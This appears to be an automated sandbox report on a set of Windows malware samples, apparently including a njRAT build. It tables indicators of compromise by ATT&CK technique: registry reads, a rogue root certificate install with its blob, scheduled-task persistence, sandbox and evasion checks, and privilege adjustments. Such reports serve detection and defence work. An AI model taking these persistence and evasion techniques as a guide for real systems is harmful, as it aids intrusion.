Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe

Program crash 2 IoCs

pid	pid_target	Process	procid_target
2116	3012	WerFault.exe	71
1936	2212	WerFault.exe	103

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	shell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ghjaedjgaw.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	lkyhjksefa.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	microsoft-onedrive.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dw20.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Akagi32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vc_redist.x64.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	crypted.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	joiner.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	hbfgjhhesfd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Bootxr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TPB-1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sunset1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Microsoft_Hardware_Launch.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Office%202010%20Toolkit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Loader.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	njrat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Mph.pif
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	systempreter.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Mph.pif
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	lastest.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	smell-the-roses.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	exit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DuckMatter.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Fulloptionv2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4363463463464363463463463.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	ghjaedjgaw.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	ghjaedjgaw.exe

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
324	timeout.exe
840	timeout.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
1180	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 19 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{A77A02B0-C876-11EF-9C49-4E0B11BE40FD} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 504d989a825cdb01	powershell.exe

Modifies system certificate store 2 TTPs 5 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	TPB-1.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	TPB-1.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	ghjaedjgaw.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	ghjaedjgaw.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	ghjaedjgaw.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 7 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2808	schtasks.exe
1220	schtasks.exe
2448	schtasks.exe
2280	schtasks.exe
2204	schtasks.exe
2256	schtasks.exe
2644	schtasks.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
2928	portable_util.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2208	svchost.exe
2208	svchost.exe
2208	svchost.exe
2208	svchost.exe
2208	svchost.exe
2208	svchost.exe
2208	svchost.exe
2208	svchost.exe
2208	svchost.exe
2208	svchost.exe
2208	svchost.exe
2208	svchost.exe
2208	svchost.exe
2208	svchost.exe
2208	svchost.exe
2208	svchost.exe
2208	svchost.exe
2208	svchost.exe
2208	svchost.exe
2208	svchost.exe
2208	svchost.exe
2208	svchost.exe
2208	svchost.exe
2208	svchost.exe
2208	svchost.exe
2208	svchost.exe
2208	svchost.exe
2208	svchost.exe
2208	svchost.exe
2208	svchost.exe
2208	svchost.exe
2208	svchost.exe
2208	svchost.exe
2208	svchost.exe
2208	svchost.exe
2208	svchost.exe
2208	svchost.exe
2208	svchost.exe
2208	svchost.exe
2208	svchost.exe
2208	svchost.exe
2208	svchost.exe
2208	svchost.exe
2208	svchost.exe
2208	svchost.exe
2208	svchost.exe
2208	svchost.exe
2208	svchost.exe
2208	svchost.exe
2208	svchost.exe
2208	svchost.exe
2208	svchost.exe
2208	svchost.exe
2208	svchost.exe
2208	svchost.exe
2208	svchost.exe
2208	svchost.exe
2208	svchost.exe
2208	svchost.exe
2208	svchost.exe
2208	svchost.exe
2208	svchost.exe
2208	svchost.exe
2208	svchost.exe

Suspicious behavior: GetForegroundWindowSpam 11 IoCs

pid	Process
1600	7zFM.exe
2824	hbfgjhhesfd.exe
2208	svchost.exe
1752	winvnc.exe
2952	diskutil.exe
1652	svchost.exe
1900	rundll32.exe
928	Microsoft_Hardware_Launch.exe
3004	server.exe
1256	svchost.exe
3004	server.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeRestorePrivilege	1600	7zFM.exe
Token: 35	1600	7zFM.exe
Token: SeSecurityPrivilege	1600	7zFM.exe
Token: SeDebugPrivilege	2484	4363463463464363463463463.exe
Token: SeDebugPrivilege	2492	New Text Document mod.exe
Token: SeDebugPrivilege	2824	hbfgjhhesfd.exe
Token: SeDebugPrivilege	2652	msgde.exe
Token: SeDebugPrivilege	1180	taskkill.exe
Token: SeDebugPrivilege	2208	svchost.exe
Token: 33	2208	svchost.exe
Token: SeIncBasePriorityPrivilege	2208	svchost.exe
Token: SeDebugPrivilege	1876	XClient.exe
Token: 33	2208	svchost.exe
Token: SeIncBasePriorityPrivilege	2208	svchost.exe
Token: SeDebugPrivilege	568	powershell.exe
Token: SeDebugPrivilege	2180	powershell.exe
Token: SeDebugPrivilege	2508	powershell.exe
Token: SeDebugPrivilege	1640	powershell.exe
Token: SeDebugPrivilege	1876	XClient.exe
Token: 33	2208	svchost.exe
Token: SeIncBasePriorityPrivilege	2208	svchost.exe
Token: 33	2208	svchost.exe
Token: SeIncBasePriorityPrivilege	2208	svchost.exe
Token: 33	2208	svchost.exe
Token: SeIncBasePriorityPrivilege	2208	svchost.exe
Token: 33	2208	svchost.exe
Token: SeIncBasePriorityPrivilege	2208	svchost.exe
Token: SeDebugPrivilege	1652	svchost.exe
Token: 33	2208	svchost.exe
Token: SeIncBasePriorityPrivilege	2208	svchost.exe
Token: SeDebugPrivilege	1652	svchost.exe
Token: 33	2208	svchost.exe
Token: SeIncBasePriorityPrivilege	2208	svchost.exe
Token: SeDebugPrivilege	2020	diskutil.exe
Token: SeDebugPrivilege	2952	diskutil.exe
Token: 33	2208	svchost.exe
Token: SeIncBasePriorityPrivilege	2208	svchost.exe
Token: 33	2208	svchost.exe
Token: SeIncBasePriorityPrivilege	2208	svchost.exe
Token: 33	2208	svchost.exe
Token: SeIncBasePriorityPrivilege	2208	svchost.exe
Token: 33	2208	svchost.exe
Token: SeIncBasePriorityPrivilege	2208	svchost.exe
Token: 33	2208	svchost.exe
Token: SeIncBasePriorityPrivilege	2208	svchost.exe
Token: 33	2208	svchost.exe
Token: SeIncBasePriorityPrivilege	2208	svchost.exe
Token: 33	2208	svchost.exe
Token: SeIncBasePriorityPrivilege	2208	svchost.exe
Token: 33	2208	svchost.exe
Token: SeIncBasePriorityPrivilege	2208	svchost.exe
Token: 33	2208	svchost.exe
Token: SeIncBasePriorityPrivilege	2208	svchost.exe
Token: 33	2208	svchost.exe
Token: SeIncBasePriorityPrivilege	2208	svchost.exe
Token: 33	2208	svchost.exe
Token: SeIncBasePriorityPrivilege	2208	svchost.exe
Token: 33	2208	svchost.exe
Token: SeIncBasePriorityPrivilege	2208	svchost.exe
Token: 33	2208	svchost.exe
Token: SeIncBasePriorityPrivilege	2208	svchost.exe
Token: 33	2208	svchost.exe
Token: SeIncBasePriorityPrivilege	2208	svchost.exe
Token: 33	2208	svchost.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
1600	7zFM.exe
1600	7zFM.exe
1752	winvnc.exe
1752	winvnc.exe
1752	winvnc.exe
1752	winvnc.exe
1752	winvnc.exe
1752	winvnc.exe
1752	winvnc.exe
1752	winvnc.exe
1752	winvnc.exe
1752	winvnc.exe
1752	winvnc.exe
1752	winvnc.exe
1752	winvnc.exe
1752	winvnc.exe
1752	winvnc.exe
1752	winvnc.exe
1752	winvnc.exe
1752	winvnc.exe
1752	winvnc.exe
2956	Mph.pif
2956	Mph.pif
2956	Mph.pif
2724	NOTEPAD.EXE
2452	taskmgr.exe
2452	taskmgr.exe
2452	taskmgr.exe
2452	taskmgr.exe
2452	taskmgr.exe
2452	taskmgr.exe
2452	taskmgr.exe
2452	taskmgr.exe
2452	taskmgr.exe
2452	taskmgr.exe
2452	taskmgr.exe
2452	taskmgr.exe
2452	taskmgr.exe
2452	taskmgr.exe
2452	taskmgr.exe
2452	taskmgr.exe
2452	taskmgr.exe
2452	taskmgr.exe
2452	taskmgr.exe
2452	taskmgr.exe
2452	taskmgr.exe
2452	taskmgr.exe
2452	taskmgr.exe
2452	taskmgr.exe
2452	taskmgr.exe
2452	taskmgr.exe
2452	taskmgr.exe
2452	taskmgr.exe
1752	winvnc.exe
1752	winvnc.exe
1752	winvnc.exe
2452	taskmgr.exe
2452	taskmgr.exe
2452	taskmgr.exe
2452	taskmgr.exe
2452	taskmgr.exe
2452	taskmgr.exe
2452	taskmgr.exe
2452	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
1752	winvnc.exe
1752	winvnc.exe
1752	winvnc.exe
1752	winvnc.exe
1752	winvnc.exe
1752	winvnc.exe
1752	winvnc.exe
1752	winvnc.exe
1752	winvnc.exe
1752	winvnc.exe
1752	winvnc.exe
1752	winvnc.exe
2956	Mph.pif
2956	Mph.pif
2956	Mph.pif
2452	taskmgr.exe
2452	taskmgr.exe
2452	taskmgr.exe
2452	taskmgr.exe
2452	taskmgr.exe
2452	taskmgr.exe
2452	taskmgr.exe
2452	taskmgr.exe
2452	taskmgr.exe
2452	taskmgr.exe
2452	taskmgr.exe
2452	taskmgr.exe
2452	taskmgr.exe
2452	taskmgr.exe
2452	taskmgr.exe
2452	taskmgr.exe
2452	taskmgr.exe
2452	taskmgr.exe
2452	taskmgr.exe
2452	taskmgr.exe
2452	taskmgr.exe
2452	taskmgr.exe
2452	taskmgr.exe
2452	taskmgr.exe
2452	taskmgr.exe
2452	taskmgr.exe
2452	taskmgr.exe
2452	taskmgr.exe
1752	winvnc.exe
1752	winvnc.exe
2452	taskmgr.exe
2452	taskmgr.exe
2452	taskmgr.exe
2452	taskmgr.exe
2452	taskmgr.exe
2452	taskmgr.exe
